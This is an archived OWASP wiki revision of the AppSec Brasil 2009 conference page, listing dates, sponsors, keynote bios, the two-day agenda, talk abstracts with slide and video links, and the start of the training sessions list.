		<id>https://wiki.owasp.org/index.php?title=AppSec_Brasil_2009&amp;diff=72854</id>
		<title>AppSec Brasil 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AppSec_Brasil_2009&amp;diff=72854"/>
				<updated>2009-11-09T13:31:28Z</updated>
		
		<summary type="html">&lt;p&gt;Ulisses Castro: Ulisses Castro, Agenda and Abstracts fix&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__&lt;br /&gt;
&lt;br /&gt;
'''Para a versão em português, veja em [[AppSec Brasil 2009 (pt-br)]]'''&lt;br /&gt;
&lt;br /&gt;
= International Conference on Application Security  =&lt;br /&gt;
&lt;br /&gt;
[http://www.ticontrole.gov.br TI-Controle] and the Computing Centre of the [http://www.camara.gov.br Deputy Chamber] present the '''First International Conference on Application Security''' that will happen in [http://en.wikipedia.org/wiki/Brasília Brasilia, Capital of Brazil] with the support of OWASP [[Brazilian]] Chapter. The Conference consists of two days of training sessions, followed by a two-day conference on a single track. [[Image:Brasilia Panorama.jpg]] &lt;br /&gt;
&lt;br /&gt;
== Conference Dates  ==&lt;br /&gt;
&lt;br /&gt;
The conference will happen from October 27th, 2009 to October 30th, 2009. The first two days will be tutorial days (see below). Plenary sessions will be held on October 29th and 30th. &lt;br /&gt;
&lt;br /&gt;
== Conference's Slides and Videos  ==&lt;br /&gt;
&lt;br /&gt;
The Presentations' slides and videos are available under the [http://www.owasp.org/index.php/AppSec_Brasil_2009#tab=Presentation_Abstracts Presentation Abstracts tab]. &lt;br /&gt;
&lt;br /&gt;
The Training Sessions' slides are available under the [http://www.owasp.org/index.php/AppSec_Brasil_2009#tab=Training_Sessions Training Sessions tab] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Sponsorship  ====&lt;br /&gt;
&lt;br /&gt;
This conference is promoted by [http://www.ticontrole.gov.br TI-Controle] Community and organized by Computing Centre of [http://www.camara.gov.br/ Brazilian Deputy Chamber]. &lt;br /&gt;
&lt;br /&gt;
The conference is supported by OWASP [[Brazilian|Brazilian Chapter]], as content provider (talks selection, trainings and schedule grid). &lt;br /&gt;
&lt;br /&gt;
The conference is supported by the [http://www.unb.br University of Brasilia] (UnB) [[Image:Unb.gif|60px]] &lt;br /&gt;
&lt;br /&gt;
The conference is sponsored by [http://www.conviso.com.br Conviso IT Security] [[Image:CorVersao BR Small.jpg|100px]] and [http://www.leadcomm.com.br LeadComm] [[Image:LeadComm Logo Screen.jpg|100px]] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Keynotes  ====&lt;br /&gt;
&lt;br /&gt;
[[Image:GaryMcGraw.JPG|left|60px]] '''Gary McGraw''' &lt;br /&gt;
&lt;br /&gt;
CTO, [http://www.cigital.com Cigital] &lt;br /&gt;
&lt;br /&gt;
''Title:'' '''The Building Security In Maturity Model (BSIMM)''' &lt;br /&gt;
&lt;br /&gt;
''Bio:'' Gary McGraw is the CTO of Cigital, Inc., a software security and quality consulting firm with headquarters in the Washington, D.C. area. He is a globally recognized authority on software security and the author of eight best selling books on this topic. His titles include Java Security, Building Secure Software, Exploiting Software, Software Security, and Exploiting Online Games; and he is editor of the Addison-Wesley Software Security series. Dr. McGraw has also written over 100 peer-reviewed scientific publications, authors a monthly security column for informIT, and is frequently quoted in the press. Besides serving as a strategic counselor for top business and IT executives, Gary is on the Advisory Boards of Fortify Software and Raven White. His dual PhD is in Cognitive Science and Computer Science from Indiana University where he serves on the Dean's Advisory Council for the School of Informatics. Gary served on the IEEE Computer Society Board of Governors, produces the monthly Silver Bullet Security Podcast for IEEE Security &amp;amp;amp; Privacy magazine (syndicated by informIT), and produces the Reality Check Security Podcast for CSO Online. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
'''Jason Li''' &lt;br /&gt;
&lt;br /&gt;
[http://www.aspectsecurity.com Aspect Security] &lt;br /&gt;
&lt;br /&gt;
''Title:'' '''Agile and Secure: Can We Do Both?''' &lt;br /&gt;
&lt;br /&gt;
Co-author: '''Jerry Hoff''', Aspect Security &lt;br /&gt;
&lt;br /&gt;
''Bio:'' Jason Li is a Senior Application Security Engineer at Aspect Security. Jason has led security architecture reviews, application security code reviews, penetration tests and provided web application security training services for a variety of commercial, financial, and government customers. He is also actively involved in the Open Web Application Security Project (OWASP), serving on the OWASP Global Projects Committee and as a co-author of the OWASP AntiSamy Project (Java version). Jason earned his Post-Master's degree in Computer Science with a concentration in Information Assurance from Johns Hopkins University. He earned his Master's degree in Computer Science from Cornell University, where he also earned his Bachelor's degree, double majoring in Computer Science and Operations Research. &lt;br /&gt;
&lt;br /&gt;
Jerry Hoff is a Senior Application Security Engineer at Aspect Security. Jerry has led and performed numerous application security code reviews for clients across multiple industries. Jerry also provides training services for clients, and has over 10 years teaching and development experience. Jerry is also involved in the Open Web Application Security Project (OWASP) and was the lead developer of AntiSamy.net project. He has a master's degree in Computer Science from Washington University in St. Louis. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
'''Dinis Cruz''' &lt;br /&gt;
&lt;br /&gt;
OWASP Board &lt;br /&gt;
&lt;br /&gt;
''Title:'' '''To be defined''' &lt;br /&gt;
&lt;br /&gt;
''Bio:'' Coming Soon. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
'''Kuai Hinojosa''' &lt;br /&gt;
&lt;br /&gt;
OWASP &lt;br /&gt;
&lt;br /&gt;
''Title:'' '''Deploying Secure Web Applications with OWASP Resources''' &lt;br /&gt;
&lt;br /&gt;
''Bio:'' Kuai Hinojosa has been developing and securing web applications for about 12 years. He previously worked in the banking industry as a database security administrator for the 5th largest bank in the U.S. where he worked in a small team developing applications that protected company's assets. He now works for New York University as a Web Applications Specialist where he continues to use web application development and application security experience to protect university resources. In his spare time Kuai volunteers his time preaching the application security gospel and leading the Minneapolis OWASP chapter. Kuai is a member of the OWASP (Open Web Application Security Project) Global Education Committee. &lt;br /&gt;
&lt;br /&gt;
==== Agenda  ====&lt;br /&gt;
&lt;br /&gt;
'''Conference Program - Day 1 - October 29th 2009 ''' &lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
{| width=&amp;quot;80%&amp;quot; class=&amp;quot;t&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;17&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 08:30 - 09:00 &lt;br /&gt;
| bgcolor=&amp;quot;#8595c2&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Reception Desk Open'''&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;17&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 09:00 - 10:00 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Opening Ceremony'''&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;49&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 10:00 - 10:30 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Dinis Cruz&amp;lt;br&amp;gt;''' What is OWASP?&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;32&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 10:30 - 12:30 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Gary McGraw (Cigital)&amp;lt;br&amp;gt;''' The Building Security In Maturity Model (BSIMM)&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;17&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 12:30 - 14:00 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Lunch Break'''&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;47&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 14:00 - 14:50 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Dinis Cruz&amp;lt;br&amp;gt;''' OWASP Project Tour&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;32&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 14:50 - 15:40 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Thomas Schreiber&amp;lt;br&amp;gt;''' The Logic and Semantic Layer of Web Application Security&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;17&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 15:40 - 16:00 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Break'''&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;47&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 16:00 - 16:50 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Brian Contos&amp;lt;br&amp;gt;''' Making a Case for Data Security to Network-Centric Peers and Managers and Leveraging Web Application Firewalls (WAF) and Database Activity Monitoring (DAM) to Augment Secure Coding &amp;amp;amp; Review Practices&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;32&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 16:50 - 17:40 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Matt Tesauro&amp;lt;br&amp;gt;''' OWASP ROI: Optimize Security Spending using OWASP&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;47&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 17:40 - 18300 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Pravir Chandra &amp;lt;br&amp;gt;''' Software Assurance Maturity Model (SAMM)&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;17&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 18:30 - 18:35 &lt;br /&gt;
| bgcolor=&amp;quot;#cccccc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''End of the First Day Program'''&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;/center&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Conference Program - Day 2 - October 30th 2009''' &lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
{| width=&amp;quot;80%&amp;quot; class=&amp;quot;t&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;17&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 08:30 - 09:00 &lt;br /&gt;
| bgcolor=&amp;quot;#8595c2&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Reception Desk Open'''&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;32&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 09:00 - 10:30 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Jason Li e Jerry Hoff (Aspect Security) '''&amp;lt;br&amp;gt; Agile and Secure - Can we do both?&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;17&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 10:30 - 10:50 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Break'''&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;47&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 10:30 - 11:40 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Cassio Goldschmidt'''&amp;lt;br&amp;gt; Praticas e ferramentas fundamentais para o desenvolvimento de software seguro &amp;lt;br&amp;gt; (''Tools and Practices for Secure Software Development'')&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;32&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 11:40 - 12:30 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Luiz Otávio Duarte'''&amp;lt;br&amp;gt; Abordagem Preventiva para Teste de Segurança em Aplicações Web &amp;lt;br&amp;gt; (''Preventive Approach for Web Application Security Testing'')&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;17&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 12:30 - 14:00 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Lunch Break'''&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;32&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 14:00 - 15:10 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Ulisses Castro'''&amp;lt;br&amp;gt;SQL Injection: Amplifying Data Leakeage&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;32&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 15:10 - 16:00 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Sebastian Cufre'''&amp;lt;br&amp;gt; Automated SQL Ownage Techniques&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;17&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 16:00 - 16:20 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Break'''&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;32&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 16:20 - 17:10 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Klaubert Herr da Silveira'''&amp;lt;br&amp;gt; ModSecurity: Firewall OpenSource para Aplicações Web (WAF) &amp;lt;br&amp;gt; (''ModSecurity, Open Source Web Application Firewall'')&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;32&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 17:10 - 18:00 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Philippe Sevestre'''&amp;lt;br&amp;gt; Programação Segura utilizando Análise Estática &amp;lt;br&amp;gt; (''Secure Programming with Static Analysis'')&lt;br /&gt;
|-&lt;br /&gt;
| height=&amp;quot;17&amp;quot; width=&amp;quot;14%&amp;quot; align=&amp;quot;right&amp;quot; | 18:00 - 18:30 &lt;br /&gt;
| bgcolor=&amp;quot;#cccccc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''End of the Conference'''&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;/center&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Presentation Abstracts  ====&lt;br /&gt;
&lt;br /&gt;
'''The Building Security In Maturity Model (BSIMM)''' &lt;br /&gt;
&lt;br /&gt;
''Gary McGraw'', Cigital &lt;br /&gt;
&lt;br /&gt;
As a discipline, software security has made great progress over the last decade. There are now at least 34 large scale software security initiatives underway in enterprises including global financial services firms, independent software vendors, defense organizations, and other verticals. In 2008, Brian Chess, Sammy Migues and I interviewed the executives running nine initiatives using the twelve practices of the Software Security Framework as our guide. Those companies among the nine who graciously agreed to be identified include: Adobe, The Depository Trust and Clearing Corporation (DTCC), EMC, Google, Microsoft, QUALCOMM, and Wells Fargo. The resulting data, drawn from real programs at different levels of maturity was used to guide the construction of the Building Security In Maturity Model (BSIMM). This talk will describe the observation-based maturity model, drawing examples from many real software security programs. A maturity model is appropriate because improving software security almost always means changing the way an organization works ---people, process, and automation are all required. While not all organizations need to achieve the same security goals, all successful large scale software security initiatives share common ideas and approaches. Whether you rely on the Cigital Touchpoints, Microsoft's SDL, or OWASP CLASP, there is much to learn from practical experience. Use the BSIMM as a yardstick to determine where you stand and what kind of software security plan will work best for you. &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/b/bd/Bsimm09.pdf Slides]&amp;lt;br&amp;gt; [http://vimeo.com/7476912 Video] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Agile and Secure: Can We Do Both?''' &lt;br /&gt;
&lt;br /&gt;
''Jason Li and Jerry Hoff'', Aspect Security &lt;br /&gt;
&lt;br /&gt;
Agile is taking the software development world by storm, but security has been slow to adapt. What can we learn from the Agile movement? Is it possible to achieve security and remain Agile? Jason and Jerry will share Aspect Security's experiences working with Agile teams to gain assurance and save money. They'll compare and contrast traditional waterfall and agile processes and show how we can achieve assurance and security while remaining true to Agile principles. &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/d/d4/Jerry.Hoff.brazil_presentation.pdf Slides]&amp;lt;br&amp;gt; [http://vimeo.com/7461340 Video] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Deploying Secure Web Applications with OWASP Resources''' &lt;br /&gt;
&lt;br /&gt;
''Kuai Hinojosa'', NY University and OWASP &lt;br /&gt;
&lt;br /&gt;
Universities are key to making application security visible and the need to educate software developers about application security as an aspect of proper software development has never been more important. In this presentation I will share how OWASP resources can be used by universities to develop, test and deploy secure web applications. I will discuss challenges that Universities currently face integrating a pplication security best practices, describe how OWASP tools and resources are currently used at New York University to test for most common web application flaws. I will introduce projects such as the OWASP Enterprise Security API which can be used to mitigate most common flaws in web applications and share initiatives the OWASP Global Education Committee is currently working on. If you are interested in securing web applications, and supporting the OWASP Global Education Committee efforts you don't want to miss this! &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''What is OWASP''' &lt;br /&gt;
&lt;br /&gt;
''Dinis Cruz'', OWASP &lt;br /&gt;
&lt;br /&gt;
TBD. &lt;br /&gt;
&lt;br /&gt;
[http://vimeo.com/7482554 Video] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''OWASP Project Tour''' &lt;br /&gt;
&lt;br /&gt;
''Dinis Cruz'', OWASP &lt;br /&gt;
&lt;br /&gt;
TBD. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''The Logic and Semantic Layer of Web Application Security''' &lt;br /&gt;
&lt;br /&gt;
''Thomas Schreiber'', SecureNet &lt;br /&gt;
&lt;br /&gt;
Testing Web Application Security mostly focusses on technical weaknesses only. But there is a huge field of potential weaknesses above the server layer and beyond the implementational aspects. Even if a web application is totally free from security bugs in code and system, it may still be vulnerable to dangerous threats. It is the kind how the business logic is mapped onto software, that gives an attacker a starting point for his bad intents. The presentation shows, illustrated with various real examples, how a clever hacker may reveal sensitive data - including credit card data -, enter into user accounts or conduct a denial-of-service on the whole infrastructure - not only the server - by attacking the logical and semantical layers. The presentation also gives hints on how to avoid these pitfalls. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Making a Case for Data Security to Network-Centric Peers and Managers and Leveraging Web Application Firewalls (WAF) and Database Activity Monitoring (DAM) to Augment Secure Coding &amp;amp;amp; Review Practices''' &lt;br /&gt;
&lt;br /&gt;
''Brian Contos'', Imperva &lt;br /&gt;
&lt;br /&gt;
Information system security has changed. The days of being focused on network security measures, operating system vulnerabilities, and open ports, while still important, is no longer the main concern for most organizations. Today, the attackers – organized crime, competitors, nation-states, and malicious insiders are going after the assets that process and store data: applications and databases. The criminals are already fighting the fight on this front. In response, organizations are deploying new defenses - adopting application and data security countermeasures that allow them to protect, monitor and respond to nefarious activity. &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/f/f6/OWASP_Brian_Contos_Making_a_Case_for_Data_Security_to_Network-Centric_Peers_and_Managers_October2009_Final.zip Slides]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''OWASP ROI: Optimize Security Spending using OWASP''' &lt;br /&gt;
&lt;br /&gt;
''Matt Tesauro'' &lt;br /&gt;
&lt;br /&gt;
Considering the current economic times, security spending is tighter than ever. This presentation will cover the Open Web Application Security Project (OWASP) projects and how they can improve your application security posture in a budgetfriendly way. OWASP is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted. The OWASP Foundation is a notforprofit entity and provides unbiased, practical, costeffective information about application security. Projects covered include the OWASP Top 10, OWASP Testing Guide, OpenSAMM Enterprise Security API (ESAPI), Application Security Verification Standard (ASVS), Application Security Desk Reference (ASDR) and others. A case study of a specific company's success with implementing OWASP methodologies and tools will also be provided. In this case study, the company realized a saving of nearly $400,000 in year one. &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/d/db/AppSec_Brazil_OWASP_ROI-mtesauro.pdf Slides]&amp;lt;br&amp;gt; [http://vimeo.com/7461624 Video] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Software Assurance Maturity Model (SAMM)''' &lt;br /&gt;
&lt;br /&gt;
''Pravir Chandra'', Fortify &lt;br /&gt;
&lt;br /&gt;
The Software Assurance Maturity Model (SAMM) (http://www.opensamm.org) is a flexible and prescriptive framework for building security into a software development organization. Covering more than typical SDLC-based models for security, SAMM enables organizations to self-assess their security assurance program and then use recommended roadmaps to improve in a way that's aligned to the specific risks facing the organization. Beyond that, SAMM enables creation of scorecards for an organization's effectiveness at secure software development throughout the typical governance, development, and deployment business functions. Scorecards also enable management within an organization to demonstrate quantitative improvements through iterations of building a security assurance program. This workshop will introduce the SAMM framework and walk through useful activities such as assessing an assurance program, mapping an existing organization to a recommended roadmap, and iteratively building an assurance program. Time allowing, additional case studies will also be discussed. SAMM is an open a free project and has recently been added under the Open Web Application Security Project (OWASP). &lt;br /&gt;
&lt;br /&gt;
[http://www.opensamm.org/downloads/OpenSAMM-1.0.ppt Slides]&amp;lt;br&amp;gt; [http://vimeo.com/7461495 Video] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
'''SQL Injection: Amplifying Data Lekeage'''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Ulisses Castro'' &lt;br /&gt;
&lt;br /&gt;
Talk about how some SQL Injection techniques works and how they can be more effective when mixin with some available database native functions. &lt;br /&gt;
&lt;br /&gt;
The main idea is how you can amplifying the amount of data that is downloaded per request to the web server.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Slides&amp;lt;br&amp;gt;[http://vimeo.com/7460521 Video] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Automated SQL Ownage Techniques''' &lt;br /&gt;
&lt;br /&gt;
''Sebastian Cufre'', Core Security &lt;br /&gt;
&lt;br /&gt;
This talk is about web application security assessment. In particular, in this talk we set to improve the assessment process for SQL injection vulnerabilities by providing the means to discard exogenous &amp;quot;false positive&amp;quot; alarms and confirm exploitable vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
We propose a black-box technique to detect and exploit SQL injection vulnerabilities. The exploitation provides an interface to execute arbitrary SQL code through them. Therefore, we are able to thoroughly assess the impact of the vulnerability (e.g., understand what a hacker can do). &lt;br /&gt;
&lt;br /&gt;
The core of this talk is in examining the difficulties that appear while trying to expose vulnerability and how to do a black-box interaction to automatically construct an exploit. &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/3/3a/OWASP_Brasil_2009_-_Automated_SQL_Ownage_Techniques.pptx Slides]&amp;lt;br&amp;gt; [http://vimeo.com/7462181 Video] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Praticas e ferramentas fundamentais para o desenvolvimento de software seguro (''Tools and Practices for Secure Software Development'')''' &lt;br /&gt;
&lt;br /&gt;
''Cassio Goldschmidt'', Symantec &lt;br /&gt;
&lt;br /&gt;
Implementing a security program for the whole application life cycle can be a daunting and costly task. So, in the development of this talk, we will demonstrate how it is possible to lessen the risk of this program, using high quality resource freely available on the Internet and studying the practices considered fundamental by SAFECode members (EMC, Juniper, Microsoft, Nokia, SAP, symantec). &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/5/55/Praticas_e_ferramentas_fundamentais_para_o_desenvolvimento_de_software_seguro_-_AppSec_Brasil.pptx Slides]&amp;lt;br&amp;gt; [http://vimeo.com/7461207 Video] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Abordagem Preventiva para Teste de Segurança em Aplicações Web (''Preventive Approach for Web Application Security Testing'')''' &lt;br /&gt;
&lt;br /&gt;
''Luiz Otávio Duarte, Ferrucio de Franco Rosa, Walcir M. Cardoso Jr.'', CTI/MCT &lt;br /&gt;
&lt;br /&gt;
The objetive of this lecture is to present the approach used by CTI (Renato Archer Information Technology Center, institution under the Brazilian Ministry of Science and Technology) for security testing of web applications. The presentation is organized as follows: First, an introduction will be presented, including important concepts, motivation, statistics and most critical vulnerabilities nowadays. &lt;br /&gt;
&lt;br /&gt;
Later will be shown techniques for software testing and techniques for software security testing. Then we show the approach used by CTI to security testing web application such as inspection of source code, use of regular expressions and vulnerability detection techniques. A pratical demonstration will be presented after the approach overview. &lt;br /&gt;
&lt;br /&gt;
The presentation will be finalized with conclusions and recommendations of best practices for security testing web applications. &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/8/8c/AprOwasp_LOD_FER_WAL_NewVersion.pdf Slides]&amp;lt;br&amp;gt; [http://vimeo.com/7460959 Video] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''ModSecurity: Firewall OpenSource para Aplicações Web (WAF) (''ModSecurity, Open Source Web Application Firewall'')''' &lt;br /&gt;
&lt;br /&gt;
''Klaubert Herr da Silveira'' &lt;br /&gt;
&lt;br /&gt;
With the growing complexity and importance of web applications, short development schedule, new attack techniques and the lack of attention and/or focus of developer with security, regulations and the seek for best practices, is necessary add a new layer of security to web applications, the &amp;quot;web applications firewalls&amp;quot; or WAF's. This talk will show the concepts of WAF, specially of ModSecurity, open source web application firewall, a powerful and complex tool, designed to understand and protect the web applications of many types, Will be presented their functionalities, and how it can help the day-by-day of a web site, for monitoring, protection or even as a troubleshooting tool for web application. &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/d/d6/OWASP_BSB_ModSecurity_Klaubert-Herr.ppt Slides]&amp;lt;br&amp;gt; [http://vimeo.com/7462060 Video] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Programação Segura utilizando Análise Estática (''Secure Programming with Static Analysis'')''' &lt;br /&gt;
&lt;br /&gt;
''Philippe Sevestre'', LeadComm &lt;br /&gt;
&lt;br /&gt;
Creating secure code requires more than just good intentions. Programmers need to know how to make their code safe in an almost infinite number of scenarios and configurations. Static source code analysis gives users the ability to review their work with a fine-tooth comb and uncover the kinds of errors that lead directly to vulnerabilities. This talk frames the software security problem and shows how static analysis is part of the solution. &lt;br /&gt;
&lt;br /&gt;
We will look at how static analysis works, how to integrate it into the software development processes, and how to make the most of it during security code review. Along the way we'll look at examples taken from real-world security incidents, showing how coding errors are exploited, how they could have been prevented, and how static analysis can rapidly uncover similar errors. &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/a/aa/AppSec_Brasil_2009-SecureProgrammingWithStaticAnalysis.pdf Slides]&amp;lt;br&amp;gt; [http://vimeo.com/7461756 Video] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Training Sessions  ====&lt;br /&gt;
&lt;br /&gt;
'''Risk Management Applied to Web Services''' &lt;br /&gt;
&lt;br /&gt;
''José Eduardo Malta de Sá Brandão'', IPEA &lt;br /&gt;
&lt;br /&gt;
&amp;lt;span style=&amp;quot;color: rgb(255, 0, 0);&amp;quot;&amp;gt;This course will be in Portuguese only.&amp;lt;/span&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Date: Oct 27&amp;lt;br&amp;gt; Time: Morning &lt;br /&gt;
&lt;br /&gt;
This training will present the risk management discipline regarding web services. The course focus will show concepts and systematize this discipline, exemplifying with a case study to reinforce the utility and need of using these methodology to understand and develop web services. The course should provide its students the knowledge to develop their own risk management projects. The presentation will show concepts, models and compare the main standards related to security risk management. &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/images/4/41/Owasp2009_brandao.ppt Slides] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Web Security: Techniques for Secure Application Programming''' &lt;br /&gt;
&lt;br /&gt;
